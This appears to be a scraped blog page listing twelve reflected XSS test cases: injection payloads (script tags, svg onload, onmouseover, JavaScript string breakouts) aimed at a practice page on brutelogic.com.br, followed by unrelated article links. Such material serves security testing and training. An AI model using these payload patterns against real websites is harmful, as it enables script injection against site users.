Single Reflection

Case 01 - Direct URL Injection (no parameter)

payload:

https://brutelogic.com.br/xss.php/"><script>alert(1)</script>

https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>

Case 02 - Simple HTML Injection (a)

https://brutelogic.com.br/xss.php?a=1"<script>alert(1)</script>

Case 03 - Inline HTML Injection with Double Quotes (b1)

https://brutelogic.com.br/xss.php?b1=1"><script>alert(1)</script>

https://brutelogic.com.br/xss.php?b1=1"><svg onload=alert(1)>

Case 04 - Inline HTML Injection with Single Quotes (b2)

https://brutelogic.com.br/xss.php?b2=1'><script>alert(1)</script>

https://brutelogic.com.br/xss.php?b2=1'><svg onload=alert(1)>

Case 05 - Inline HTML Injection with Double Quotes: No Tag Breaking (b3)

https://brutelogic.com.br/xss.php?b3=1" onmouseover=alert(1)//

鼠标移动到此处,就会触发XSS

Case 06 - Inline HTML Injection with Single Quotes: No Tag Breaking (b4)

https://brutelogic.com.br/xss.php?b4=1' onmouseover=alert(1)//

Case 07 - HTML Injection with Single Quotes in JS Block (c1)

https://brutelogic.com.br/xss.php?c1='</script><svg onload=alert(1)>

Case 08 - HTML Injection with Double Quotes in JS Block (c2)

https://brutelogic.com.br/xss.php?c2="</script><svg onload=alert(1)>//

Case 09 - Simple JS Injection with Single Quotes (c3)

https://brutelogic.com.br/xss.php?c3='-alert(1)-'

Case 10 - Simple JS Injection with Double Quotes (c4)

https://brutelogic.com.br/xss.php?c4="-alert(1)-"

Case 11 - Escaped JS Injection with Single Quotes (c5)

https://brutelogic.com.br/xss.php?c5=\'-alert(1)//

Case 12 - Escaped JS Injection with Double Quotes (c6)

https://brutelogic.com.br/xss.php?c6=\"-confirm(1)//

https://brutelogic.com.br/xss.php?c6=\"-alert(1)//

Source-Based XSS Test Cases的更多相关文章

  1. Portswigger web security academy:DOM Based XSS

    Portswigger web security academy:DOM Based XSS 目录 Portswigger web security academy:DOM Based XSS DOM ...

  2. DOM based XSS Prevention Cheat Sheet(DOM Based XSS防御检查单)

    本文为翻译版本,原文请查看 https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet 介绍 谈到XSS攻击,有三种公认的 ...

  3. DOM-based XSS Test Cases

    Case 23 - DOM Injection via URL parameter (by server + client) https://brutelogic.com.br/dom/dom.php ...

  4. XSS (Cross Site Scripting) Prevention Cheat Sheet(XSS防护检查单)

    本文是 XSS防御检查单的翻译版本 https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sh ...

  5. XSS Overview

    什么是XSS? 跨站脚本攻击(Cross Site Scripting):攻击者往Web页面里插入恶意脚本,当用户浏览该页面时,嵌入页面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的.恶意的内容通 ...

  6. XSS测试代码

    无script的Xss <img/src=# onerror=alert('XSS')> HTML5  XSS测试代码 <video> <source onerror=” ...

  7. XSS CSS Cross SiteScript 跨站脚本攻击

    XSS攻击及防御 - 高爽|Coder - CSDN博客 https://blog.csdn.net/ghsau/article/details/17027893 XSS又称CSS,全称Cross S ...

  8. The Top 50 Proprietary Programs that Drive You Crazy — and Their Open Source Alternatives

    The Top 50 Proprietary Programs that Drive You Crazy — and Their Open Source Alternatives 01 / 22 / ...

  9. 这一次,彻底理解XSS攻击

    希望读完本文大家彻底理解XSS攻击,如果读完本文还不清楚,我请你吃饭慢慢告诉你~ 话不多说,我们进入正题. 一.简述 跨站脚本(Cross-site scripting,简称为:CSS, 但这会与层叠 ...

随机推荐

  1. ssm日期格式转换

    ssm日期格式转换 1      需求 前端传入字符串类型日期转化成java中的Date类型,存入数据库中;将数据库中的日期类型通过jstl标签在前端页面转换成字符串类型. 2      步骤 2.1 ...

  2. HTTP传输编码增加了传输量,只为解决这一个问题 | 实用 HTTP

    题图:by @Olga Hi,大家好,我是承香墨影! HTTP 协议在网络知识中占据了重要的地位,HTTP 协议最基础的就是请求和响应的报文,而报文又是由报文头(Header)和实体组成.大多数 HT ...

  3. Lumen框架—升级改造之路-仓储层

    仓储层与逻辑层搭建  Lumen官方文档:https://lumen.laravel.com/docs/5.5 我的项目地址:https://github.com/BusinessL/big-lume ...

  4. 第7章 UserInfo端点(UserInfo Endpoint) - IdentityModel 中文文档(v1.0.0)

    OpenID Connect UserInfo端点的客户端库是作为扩展HttpClient方法提供的. 以下代码将访问令牌发送到UserInfo端点: var client = new HttpCli ...

  5. SpaceSyntax【空间句法】之DepthMapX学习:第一篇 数据的输入 与 能做哪些分析

    两部分,1需要喂什么东西给软件,2它能干什么(输出什么东西在下一篇讲) 博客园/B站/知乎/CSDN @秋意正寒 转载请在头部附上源地址 目录:https://www.cnblogs.com/onsu ...

  6. arcgis api 3.x for js 入门开发系列二十二地图模态层(附源码下载)

    前言 关于本篇功能实现用到的 api 涉及类看不懂的,请参照 esri 官网的 arcgis api 3.x for js:esri 官网 api,里面详细的介绍 arcgis api 3.x 各个类 ...

  7. 安卓开发笔记(十八):实现button按钮事件的三种方法

    Android开发中有三种主要的方式用于设置View的点击事件,1.创建内部类:2.主类中实现OnClickListener接口:3.使用匿名内部类.这三种方式都用到了OnClickListener接 ...

  8. python3 集合 操作方法

    今天都是课, 就学这么点  不多说 睡觉睡觉!!! #!usr/bin/env/ python # -*- coding:utf-8 -*- # Author:XiaoFeng list = [1,2 ...

  9. Linux:Day20(下) http基础

    Web Service Port number: 0-1023:众所周知,永久的分配给固定的应用使用,22/tcp(ssh),80/tcp(http),443/tcp(https) 1024-4195 ...

  10. Cocos Creator—优化首页打开速度

    Cocos Creator是一个优秀的游戏引擎开发工具,很多地方都针对H5游戏做了专门的优化,这是我比较喜欢Cocos Creator的一点原因. 其中一个优化点是首页的加载速度,开发组为了加快首页的 ...